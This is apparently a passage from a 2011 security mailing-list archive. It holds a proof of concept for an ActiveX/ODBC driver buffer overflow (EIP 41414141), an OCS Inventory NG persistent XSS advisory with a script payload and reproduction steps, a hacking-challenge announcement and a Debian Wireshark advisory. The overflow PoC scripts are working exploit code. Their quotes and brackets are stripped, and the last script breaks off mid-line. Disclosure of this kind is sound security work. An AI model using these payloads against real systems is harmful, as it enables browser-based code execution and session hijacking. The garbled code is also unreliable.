ESI 02B56FF8
EDI 0001
EIP 41414141
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr WSAHOST_NOT_FOUND (2AF9)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
MM0    
MM1    
MM2    
MM3    
MM4    
MM5    
MM6 8000   
MM7 FEE0   

poc:

The underlying operating system contains the ADODB Connection
ActiveX control which is marked safe for initialization
and safe for scripting (implements the IObjectSafety interface)
which could allow a remote attacker to specify the
mentioned connection string. 

The IE security settings do not allow to open a connection
from another domain but this can be used in conjuntion 
with a XSS vulnerabilty, connection string pollution or 
SQL injection vulnerabilities or through specific configuration
files. Note also that I am mentioning the ADODB object for pure
commodity: when installed, the ODBC drivers are availiable 
systemwide, so this is a good basis for remote privilege elevations
of many kinds. 

Note that Internet Explorer does not crash when trying to
execute EIP, attach a tool like faultmon to the IE sub-process.

(*)
!-- saved from url=(0014)about:internet -- 
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 SQL Server Native Wire 
Protocol;HOST= + x + ;IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null;
obj.Open();
/script

!-- saved from url=(0014)about:internet -- 
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i1666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST= + x 
+ ;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;
obj.Open();
/script

!-- saved from url=(0014)about:internet -- 
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i1666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST= + x 
+

OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024)

2011-10-20 Thread Nicolas DEROUET 
OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024)
---

Software  : Open Computer and Software (OCS) Inventory NG
Download  : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Discover  : 2011-10-04
Published : 2011-10-05
Version   : 2.0.1 and prior
Impact    : Persistent XSS
Remote    : Yes (No authentication is needed)
CVE-ID    : CVE-2011-4024


Info


Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.


Details
---

The vulnerability is in the data sent by the agent OCS. The inventory service
and the admin panel does not control the data received. An attacker could inject
malicous HTML/JS through into the inventory information (eg. the computer
description field under WinXP). This data is printed in the admin panel wich
can lead to a session hijack or whatever you want.


PoC
---

1. Enter the XSS script (eg.
scriptalert(String.fromCharCode(88,83,83))/script)
   in the computer description field. (WinXP  System Properties  Computer
   Name  Computer Description)

2. Launch an inventory with OCS Agent

3. Go on the admin panel (http://SERVER/ocsreports/)

4. View your computer detail

Tested on : OCS Agent 2.0.1 (WinXP SP3) and OCS Server 2.0.1 (Windows).
Not tested on : Linux Plateform and GLPI (OCS import)


Solution


Upgrade to OCS Inventory NG 2.0.2

GotRoot Security Challenge

2011-10-20 Thread Ivan Buetler 
Hi all,

We are proud to present a new free hacking challenge! It's all about
getting root on a linux host! This time, we will provide a target host
you will access with ssh and to disclose the /root/secret.txt file.
Increase your knowledge about restricted environments and bypassing
them; enjoy this free event! 


Interested? Please sign-up a Hacking-Lab account and register yourself
(free) to the Hacking Challenge classroom. 
* https://www.hacking-lab.com/events/

Direct registration URL
* https://www.hacking-lab.com/events/registerform.html?eventid=199

Other Challenges
* There are other challenges available in the same classroom
* Web Security challenges and more ..

Regards
Ivan Buetler / E1
Compass Security, Switzerland

[SECURITY] [DSA 2324-1] wireshark security update

2011-10-20 Thread Moritz Muehlenhoff 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2324-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
October 20, 2011   http://www.debian.org/security/faq
- -

Package: wireshark
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3360 

The Microsoft Vulnerability Research group discovered that insecure
load path handling could lead to execution of arbitrary Lua script code.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.0.2-3+lenny15. This build will be released shortly.

For the stable distribution (squeeze), this problem has been fixed in
version 1.2.11-6+squeeze4.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.2-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk6gejgACgkQXm3vHE4uylpyVQCg42CjnLYSmkZAXRA893RRPvVd
VnoAoKQyv6Bp7DcLxOuQ4HWeezkIhJ2/
=Ukxm
-END PGP SIGNATURE-